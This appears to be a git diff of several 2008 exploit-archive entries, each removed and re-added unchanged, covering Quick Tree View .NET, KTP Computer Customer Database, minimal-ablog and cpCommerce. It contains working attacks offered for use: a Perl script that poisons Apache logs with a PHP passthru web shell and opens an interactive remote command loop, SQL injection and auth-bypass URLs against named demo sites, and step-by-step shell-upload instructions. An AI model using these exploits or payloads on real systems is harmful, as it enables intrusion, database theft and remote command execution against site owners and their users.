Is : ¦ -¦ From : Mor0ccan nightamres ¦ ¦ ¦ -¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! 
¦ -¦ Download : http://activewebsoftwares.com/P22_QuickTreeView.NET.aspx?Tabopen= ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ -¦ ¦ - -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - -http://localhost/script/data/qtv.mdb - -Live demo - -http://www.activewebsoftwares.com/democomponents/qtvdotnet/data/qtv.mdb - -Nayda Dima Nayda -Mgharba - - - - -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -+---- ThanX To ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -= [AttaCk Is CompLet] = 
-___________________________________________________________________________________________________________________________________________________________ - -# milw0rm.com [2008-11-30] +*********************************************************************************************************************************************************** +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!] O O O O O [!] +[!] O O O [!] +[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!] O OOO OOO O O O O OO O O O O OO O O O [!] +[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!] O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO WwW.Exploiter5.CoM ; No-ExploiT.CoM ; WwW.IQ-TY.CoM [!] +*********************************************************************************************************************************************************** ++---- Bismi Allah Irahmani ArraHim ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [ Quick Tree View .NET v 3.1 (qtv.mdb) Remote Database Disclosure Vulnerability ] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: Author : Cyber-Zone ( Abdelkhalek ) : : : +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ From : Mor0ccan nightamres ¦ ¦ ¦ +¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! 
¦ +¦ Download : http://activewebsoftwares.com/P22_QuickTreeView.NET.aspx?Tabopen= ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: : +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ + +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + +http://localhost/script/data/qtv.mdb + +Live demo + +http://www.activewebsoftwares.com/democomponents/qtvdotnet/data/qtv.mdb + +Nayda Dima Nayda +Mgharba + + + + ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ ++---- ThanX To ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ += [AttaCk Is CompLet] = 
+___________________________________________________________________________________________________________________________________________________________ + +# milw0rm.com [2008-11-30] diff --git a/platforms/php/webapps/7304.pl b/platforms/php/webapps/7304.pl index 2ba21f41f..2a8796b1a 100755 --- a/platforms/php/webapps/7304.pl +++ b/platforms/php/webapps/7304.pl 
@@ -1,164 +1,164 @@ -#!/usr/bin/perl -w -#====================================== -# KTPCCD Local File Inclusion Exploit -#====================================== -# -# ,--^----------,--------,-----,-------^--, -# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. -# `+---------------------------^----------| -# `\_,-------, _________________________| -# / XXXXXX /`| / -# / XXXXXX / `\ / -# / XXXXXX /\______( -# / XXXXXX / -# / XXXXXX / -# (________( -# `------' -# -#AUTHOR : CWH Underground -#DATE : 30 November 2008 -#SITE : cwh.citec.us -# -# -##################################################### -#APPLICATION : KTP Computer Customer Database CMS -#VERSION : 1 -#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip -###################################################### -#Note: magic_quotes_gpc = off -#Vulnerability in Local File Inclusion -#Wrote Exploit for Local File Inclusion <-> Remote Command Execution -####################################################################################### -#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -#Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - - -use LWP::UserAgent; -use IO::Socket; -use LWP::Simple; - -$log="../"; -@apache=( -"../../../../../var/log/httpd/access_log", -"../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", 
-"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"../../../../../etc/httpd/logs/access_log", -"../../../../../etc/httpd/logs/access.log", -"../../../../../etc/httpd/logs/error_log", -"../../../../../etc/httpd/logs/error.log", -"../../.. /../../var/www/logs/access_log", -"../../../../../var/www/logs/access.log", -"../../../../../usr/local/apache/logs/access_log", -"../../../../../usr/local/apache/logs/access.log", -"../../../../../var/log/apache/access_log", -"../../../../../var/log/apache/access.log", -"../../../../../var/log/access_log", -"../../../../../var/www/logs/error_log", -"../../../../../var/www/logs/error.log", -"../../../../../usr/local/apache/logs/error_log", -"../../../../../usr/local/apache/logs/error.log", -"../../../../../var/log/apache/error_log", -"../../../../../var/log/apache/error.log", -"../../../../../var/log/access_log", -"../../../../../var/log/error_log" -); - -my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } - -print "\n==============================================\n"; -print " KTP Computer Customer Database \n"; -print " Remote Command Execution Exploit \n"; -print " Discovered By CWH Underground \n"; -print "==============================================\n"; -print " \n"; -print " ,--^----------,--------,-----,-------^--, \n"; -print " | ||||||||| `--------' | O \n"; -print " `+---------------------------^----------| \n"; -print " `\_,-------, _________________________| \n"; -print " / XXXXXX /`| / \n"; -print " / XXXXXX / `\ / \n"; -print " / XXXXXX /\______( \n"; -print " / XXXXXX / \n"; -print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; -print " (________( \n"; -print " `------' \n"; -print " \n"; - - - -if (@ARGV < 2) -{ - print "Usage: ./xpl.pl <Host> <Path>\n"; - print "Ex. 
./xpl.pl www.hackme.com /ktp\n"; - -} - -$host=$ARGV[0]; -$path=$ARGV[1]; - - -if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;} - -print "\nTrying to Inject the Code...\n"; - -$CODE="<? passthru(\$_GET[cmd]) ?>"; -$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n"; -print $socket "GET /cwhunderground ".$CODE." HTTP/1.1\r\n"; -print $socket "Host: ".$host."\r\n"; -print $socket "Connection: close\r\n\r\n"; -close($socket); - -if ( $host !~ /^http:/ ) {$host = "http://" . $host;} - - foreach $getlog(@apache) - { - chomp($getlog); - $find= $host.$path."/?p=".$getlog."%00"; - $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; - $req = HTTP::Request->new(GET => $find); - $res = $xpl->request($req); - $info = $res->content; - if($info =~ /cwhunderground/) - {print "\nSuccessfully injected in $getlog \n";$log=$getlog;} - } - - -my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; } - -chomp( $cmd = <STDIN> ); - -while($cmd !~ "exit") { - - $shell= $host.$path."/?p=".$log."%00&cmd=$cmd"; - $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; - $req = HTTP::Request->new(GET => $shell); - $res = $xpl->request($req); - $info = $res->content; - print "\n$info"; - - - my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; } - chomp( $cmd = <STDIN> ); -} - -# milw0rm.com [2008-11-30] +#!/usr/bin/perl -w +#====================================== +# KTPCCD Local File Inclusion Exploit +#====================================== +# +# ,--^----------,--------,-----,-------^--, +# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+# `+---------------------------^----------| +# `\_,-------, _________________________| +# / XXXXXX /`| / +# / XXXXXX / `\ / +# / XXXXXX /\______( +# / XXXXXX / +# / XXXXXX / +# (________( +# `------' +# +#AUTHOR : CWH Underground +#DATE : 30 November 2008 +#SITE : cwh.citec.us +# +# +##################################################### +#APPLICATION : KTP Computer Customer Database CMS +#VERSION : 1 +#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip +###################################################### +#Note: magic_quotes_gpc = off +#Vulnerability in Local File Inclusion +#Wrote Exploit for Local File Inclusion <-> Remote Command Execution +####################################################################################### +#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +#Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + + +use LWP::UserAgent; +use IO::Socket; +use LWP::Simple; + +$log="../"; +@apache=( +"../../../../../var/log/httpd/access_log", +"../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"../../../../../etc/httpd/logs/access_log", +"../../../../../etc/httpd/logs/access.log", +"../../../../../etc/httpd/logs/error_log", +"../../../../../etc/httpd/logs/error.log", 
+"../../.. /../../var/www/logs/access_log", +"../../../../../var/www/logs/access.log", +"../../../../../usr/local/apache/logs/access_log", +"../../../../../usr/local/apache/logs/access.log", +"../../../../../var/log/apache/access_log", +"../../../../../var/log/apache/access.log", +"../../../../../var/log/access_log", +"../../../../../var/www/logs/error_log", +"../../../../../var/www/logs/error.log", +"../../../../../usr/local/apache/logs/error_log", +"../../../../../usr/local/apache/logs/error.log", +"../../../../../var/log/apache/error_log", +"../../../../../var/log/apache/error.log", +"../../../../../var/log/access_log", +"../../../../../var/log/error_log" +); + +my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } + +print "\n==============================================\n"; +print " KTP Computer Customer Database \n"; +print " Remote Command Execution Exploit \n"; +print " Discovered By CWH Underground \n"; +print "==============================================\n"; +print " \n"; +print " ,--^----------,--------,-----,-------^--, \n"; +print " | ||||||||| `--------' | O \n"; +print " `+---------------------------^----------| \n"; +print " `\_,-------, _________________________| \n"; +print " / XXXXXX /`| / \n"; +print " / XXXXXX / `\ / \n"; +print " / XXXXXX /\______( \n"; +print " / XXXXXX / \n"; +print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; +print " (________( \n"; +print " `------' \n"; +print " \n"; + + + +if (@ARGV < 2) +{ + print "Usage: ./xpl.pl <Host> <Path>\n"; + print "Ex. ./xpl.pl www.hackme.com /ktp\n"; + +} + +$host=$ARGV[0]; +$path=$ARGV[1]; + + +if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;} + +print "\nTrying to Inject the Code...\n"; + +$CODE="<? passthru(\$_GET[cmd]) ?>"; +$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n"; +print $socket "GET /cwhunderground ".$CODE." 
HTTP/1.1\r\n"; +print $socket "Host: ".$host."\r\n"; +print $socket "Connection: close\r\n\r\n"; +close($socket); + +if ( $host !~ /^http:/ ) {$host = "http://" . $host;} + + foreach $getlog(@apache) + { + chomp($getlog); + $find= $host.$path."/?p=".$getlog."%00"; + $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; + $req = HTTP::Request->new(GET => $find); + $res = $xpl->request($req); + $info = $res->content; + if($info =~ /cwhunderground/) + {print "\nSuccessfully injected in $getlog \n";$log=$getlog;} + } + + +my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; } + +chomp( $cmd = <STDIN> ); + +while($cmd !~ "exit") { + + $shell= $host.$path."/?p=".$log."%00&cmd=$cmd"; + $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; + $req = HTTP::Request->new(GET => $shell); + $res = $xpl->request($req); + $info = $res->content; + print "\n$info"; + + + my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; } + chomp( $cmd = <STDIN> ); +} + +# milw0rm.com [2008-11-30] diff --git a/platforms/php/webapps/7305.txt b/platforms/php/webapps/7305.txt index f27fc7907..7ad1a26b4 100755 --- a/platforms/php/webapps/7305.txt +++ b/platforms/php/webapps/7305.txt 
@@ -1,65 +1,65 @@ -================================================ - KTPCCD CMS Blind SQL Injection Vulnerability -================================================ - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 30 November 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : APPLICATION : KTP Computer Customer Database CMS - VERSION : 1 - DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip -##################################################### - -**Need Magic_quote = Off** - ---- Blind SQL Injection --- - -Login as user or Register at http://[Target]/[ktp_path]/?p=tech&a=ntech then goto Exploit... - ---------- - Exploit ---------- - -Test Blind SQL Injection in MYSQL Version 5 - -[!]True -[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5-- - -Result -Home Phone: 122-131-3123 -Cell Phone: 123-123-3123 -Fax Number: 123-213-1321 -A+ Certifcation ID: 312 - - -[!]False -[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=4-- - -Result -Home Phone: n/a -Cell Phone: n/a -Fax Number: n/a -A+ Certifcation ID: (Technician is not certified) - -####################################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - -# milw0rm.com [2008-11-30] +================================================ + KTPCCD CMS Blind SQL Injection Vulnerability +================================================ + + 
,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 30 November 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : APPLICATION : KTP Computer Customer Database CMS + VERSION : 1 + DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip +##################################################### + +**Need Magic_quote = Off** + +--- Blind SQL Injection --- + +Login as user or Register at http://[Target]/[ktp_path]/?p=tech&a=ntech then goto Exploit... + +--------- + Exploit +--------- + +Test Blind SQL Injection in MYSQL Version 5 + +[!]True +[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5-- + +Result +Home Phone: 122-131-3123 +Cell Phone: 123-123-3123 +Fax Number: 123-213-1321 +A+ Certifcation ID: 312 + + +[!]False +[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=4-- + +Result +Home Phone: n/a +Cell Phone: n/a +Fax Number: n/a +A+ Certifcation ID: (Technician is not certified) + +####################################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + +# milw0rm.com [2008-11-30] diff --git a/platforms/php/webapps/7306.txt b/platforms/php/webapps/7306.txt index 697b3cdfb..f58f04785 100755 --- a/platforms/php/webapps/7306.txt +++ b/platforms/php/webapps/7306.txt 
@@ -1,56 +1,56 @@ -=========================================================================================================== - - - [o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln - - Software : minimal-ablog version 0.4 - Vendor : http://www.abweb.co.cc/ - Download : http://code.google.com/p/minimal-ablog/downloads/list - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -=========================================================================================================== - - - [o] Vulnerable file - - index.php - admin/uploader.php - - - - [o] Exploit - - [ SQL Injection ] - - http://localhost/[path]/index.php?id=[SQL] - http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8-- <=- demo - - [ File Upload ] - - http://localhost/[path]/admin/uploader.php <=- upload your file here - http://localhost/[path]/img/[your_file] <=- file will be uploaded here - - [ Admin Bypass ] - - when you open admin/uploader.php to upload file you already have admin privs too :) - - -=========================================================================================================== - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/blog/] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke - - GANYANG MALINGSIAL!!! 
[ http://malingsial.serverisdown.org/ ] - - -=========================================================================================================== - -# milw0rm.com [2008-11-30] +=========================================================================================================== + + + [o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln + + Software : minimal-ablog version 0.4 + Vendor : http://www.abweb.co.cc/ + Download : http://code.google.com/p/minimal-ablog/downloads/list + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + +=========================================================================================================== + + + [o] Vulnerable file + + index.php + admin/uploader.php + + + + [o] Exploit + + [ SQL Injection ] + + http://localhost/[path]/index.php?id=[SQL] + http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8-- <=- demo + + [ File Upload ] + + http://localhost/[path]/admin/uploader.php <=- upload your file here + http://localhost/[path]/img/[your_file] <=- file will be uploaded here + + [ Admin Bypass ] + + when you open admin/uploader.php to upload file you already have admin privs too :) + + +=========================================================================================================== + + + [o] Greetz + + MainHack BrotherHood [ http://serverisdown.org/blog/] + Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa + H312Y yooogy mousekill }^-^{ kaka11 martfella + skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke + + GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ] + + +=========================================================================================================== + +# milw0rm.com [2008-11-30] diff --git a/platforms/php/webapps/7308.txt b/platforms/php/webapps/7308.txt index 6695ba11e..4ae6d0f3c 100755 --- a/platforms/php/webapps/7308.txt +++ b/platforms/php/webapps/7308.txt 
@@ -1,181 +1,181 @@ - Author: girex - Homepage: girex.altervista.org - - CMS: cpCommerce 1.2.6 - Site: http://cpcommerce.cpradio.org/ - - Bug: URL Rewrite -> Input variables overwrite - PoC: Auth bypass -> Shell upload - - Note: Works regardless php.ini settings - - Vendor informed: 23/11/08 - cpCommerce 1.2.7 released: 30/11/08 - Public advisory: 30/11/08 - -------------------------------------------------------------------------------------------------- - - CMS Description: cpCommerce is an open-source e-commerce solution that is maintained by templates and modules. - -------------------------------------------------------------------------------------------------- - - Vulnerability discussion: - cpCommerce sets register_globals to Off with ini_set - and stores all GET and POST variables into $input array after have addslashed them. - - lines: 16-32 - file: /functions/sanitize_value.func.php - - function SanitizeInput() - { - $input = array(); - if (isset($_GET) && sizeof($_GET) > 0 && is_array($_GET)) - { - foreach ($_GET as $key => $val) - { - if (is_array($val)) - { - $input[$key] = SanitizeArray($val); - } - else - { - $input[$key] = SanitizeValue($val); - } - } - } - - ... and does the same for POST vars - - lines: 3-13 - - function SanitizeValue($value) - { - if (!get_magic_quotes_gpc()) - { - return addslashes(preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES))); - } - else - { - return preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES)); - } - } - -------------------------------------------------------------------------------------------------- - - Let we see _funcions.php (the mainfile) - - lines: 128-132 - file: _functions.php - - $input = array(); - if ((isset($_GET) && sizeof($_GET) > 0) || (isset($_POST) && sizeof($_POST) > 0)) - { - $input = SanitizeInput(); - } - - - So, all GET and POST vars ar sanitized and stored into $input array. - Let we procede in _functions.php... 
- -------------------------------------------------------------------------------------------------- - - lines 156-173 - file: _functions.php - - if (isset($_SERVER['PATH_INFO']) && strlen($_SERVER['PATH_INFO']) != 0) - { - $rewriteValues = array(); - if (strrpos($_SERVER['PATH_INFO'], '/') == strlen($_SERVER['PATH_INFO']) - 1) - { - $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 2)); - } - else - { - $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 1)); - } - - for ($i = 0; $i < sizeof($rewriteValues); $i += 2) - { - $input[$rewriteValues[$i]] = $rewriteValues[$i + 1]; - } - } - - - $_SERVER['PATH_INFO'] is a SERVER var that contains the request url after the request page - - For example: GET http://localhost/index.php/helloword - /index.php is the page requested and $_SERVER['PATH_INFO'] contains /helloword - - As you can see from previous snipplet of code we can set $input content with - GET index.php/key/value/ - - So we can overwrite all inputs data in this cms, bypassing SanitazeInput() - and the effect of magic_quotes - - How we'll exploit that.... - -------------------------------------------------------------------------------------------------- - - lines: 13-20 - code: /actions/login.act.php - - if (checkSession($input['email'], md5($input['password']))) { - $_SESSION['cpTemplate'] = $_SESSION['cpInfo']['template']; - $return['url'] = urldecode("{$input['returnurl']}"); - } else { - - $_SESSION['loginerror'] = TRUE; - $return['url'] = urldecode("{$input['returnurl']}"); - } - - If checkSession returns true we are logged in... - - lines: 3-9 - code: /functions/account_info.func.php - - function checkSession($email,$pass) { - global $config, $db_chooser; - - $sql['accounts'] = "select `id_account`, `level` from " . $db_chooser->Accounts() . " where " . 
- "email='$email' and pass='$pass'"; - - $accounts = $db_chooser->sql_query($sql['accounts']); - - - We can manipulate this query having a SQL Injection with an auth bypass - logging in with admin priviledges... - -------------------------------------------------------------------------------------------------- - - If we set $input['email'] to: ' OR id_account=1# with the trick of PATH_INFO (index.php/email/value) - the resulting query will be: select `id_account`, `level` from cpAccounts where email='' OR id_account=1 - -------------------------------------------------------------------------------------------------- - - PoC Auth Bypass: - - GET http://[host]/[path]/index.php/email/%27%20OR%20id_account=1%23/?action=login&submit=Login&returnurl=index.php - -------------------------------------------------------------------------------------------------- - -------------------------------------------------------------------------------------------------- - - If you want to upload a shell: - -- Log in with the auth bypass PoC -- Go to /[path]/admin/ - -- Go to General Info -> Configuration -- Add ,php in What Image Extensions do you want to accept on Uploads? 
- -- Go to Product -> Create -- Select a right category -- Fill required fields -- Upload your shell.php in Product Thumbnail Image -- Save all - - Your shell wil be at /[path]/images/products/thumbnails/[name_of_shell]_[product_id].php - -------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-30] + Author: girex + Homepage: girex.altervista.org + + CMS: cpCommerce 1.2.6 + Site: http://cpcommerce.cpradio.org/ + + Bug: URL Rewrite -> Input variables overwrite + PoC: Auth bypass -> Shell upload + + Note: Works regardless php.ini settings + + Vendor informed: 23/11/08 + cpCommerce 1.2.7 released: 30/11/08 + Public advisory: 30/11/08 + +------------------------------------------------------------------------------------------------- + + CMS Description: cpCommerce is an open-source e-commerce solution that is maintained by templates and modules. + +------------------------------------------------------------------------------------------------- + + Vulnerability discussion: + cpCommerce sets register_globals to Off with ini_set + and stores all GET and POST variables into $input array after have addslashed them. + + lines: 16-32 + file: /functions/sanitize_value.func.php + + function SanitizeInput() + { + $input = array(); + if (isset($_GET) && sizeof($_GET) > 0 && is_array($_GET)) + { + foreach ($_GET as $key => $val) + { + if (is_array($val)) + { + $input[$key] = SanitizeArray($val); + } + else + { + $input[$key] = SanitizeValue($val); + } + } + } + + ... 
and does the same for POST vars + + lines: 3-13 + + function SanitizeValue($value) + { + if (!get_magic_quotes_gpc()) + { + return addslashes(preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES))); + } + else + { + return preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES)); + } + } + +------------------------------------------------------------------------------------------------- + + Let we see _funcions.php (the mainfile) + + lines: 128-132 + file: _functions.php + + $input = array(); + if ((isset($_GET) && sizeof($_GET) > 0) || (isset($_POST) && sizeof($_POST) > 0)) + { + $input = SanitizeInput(); + } + + + So, all GET and POST vars ar sanitized and stored into $input array. + Let we procede in _functions.php... + +------------------------------------------------------------------------------------------------- + + lines 156-173 + file: _functions.php + + if (isset($_SERVER['PATH_INFO']) && strlen($_SERVER['PATH_INFO']) != 0) + { + $rewriteValues = array(); + if (strrpos($_SERVER['PATH_INFO'], '/') == strlen($_SERVER['PATH_INFO']) - 1) + { + $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 2)); + } + else + { + $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 1)); + } + + for ($i = 0; $i < sizeof($rewriteValues); $i += 2) + { + $input[$rewriteValues[$i]] = $rewriteValues[$i + 1]; + } + } + + + $_SERVER['PATH_INFO'] is a SERVER var that contains the request url after the request page + + For example: GET http://localhost/index.php/helloword + /index.php is the page requested and $_SERVER['PATH_INFO'] contains /helloword + + As you can see from previous snipplet of code we can set $input content with + GET index.php/key/value/ + + So we can overwrite all inputs data in this cms, bypassing SanitazeInput() + and the effect of magic_quotes + + How we'll exploit that.... 
+ +------------------------------------------------------------------------------------------------- + + lines: 13-20 + code: /actions/login.act.php + + if (checkSession($input['email'], md5($input['password']))) { + $_SESSION['cpTemplate'] = $_SESSION['cpInfo']['template']; + $return['url'] = urldecode("{$input['returnurl']}"); + } else { + + $_SESSION['loginerror'] = TRUE; + $return['url'] = urldecode("{$input['returnurl']}"); + } + + If checkSession returns true we are logged in... + + lines: 3-9 + code: /functions/account_info.func.php + + function checkSession($email,$pass) { + global $config, $db_chooser; + + $sql['accounts'] = "select `id_account`, `level` from " . $db_chooser->Accounts() . " where " . + "email='$email' and pass='$pass'"; + + $accounts = $db_chooser->sql_query($sql['accounts']); + + + We can manipulate this query having a SQL Injection with an auth bypass + logging in with admin priviledges... + +------------------------------------------------------------------------------------------------- + + If we set $input['email'] to: ' OR id_account=1# with the trick of PATH_INFO (index.php/email/value) + the resulting query will be: select `id_account`, `level` from cpAccounts where email='' OR id_account=1 + +------------------------------------------------------------------------------------------------- + + PoC Auth Bypass: + + GET http://[host]/[path]/index.php/email/%27%20OR%20id_account=1%23/?action=login&submit=Login&returnurl=index.php + +------------------------------------------------------------------------------------------------- + +------------------------------------------------------------------------------------------------- + + If you want to upload a shell: + +- Log in with the auth bypass PoC +- Go to /[path]/admin/ + +- Go to General Info -> Configuration +- Add ,php in What Image Extensions do you want to accept on Uploads? 
+ +- Go to Product -> Create +- Select a right category +- Fill required fields +- Upload your shell.php in Product Thumbnail Image +- Save all + + Your shell wil be at /[path]/images/products/thumbnails/[name_of_shell]_[product_id].php + +------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-30] diff --git a/platforms/php/webapps/7310.txt b/platforms/php/webapps/7310.txt index 30c489508..54a1a0f72 100755 --- a/platforms/php/webapps/7310.txt +++ b/platforms/php/webapps/7310.txt 
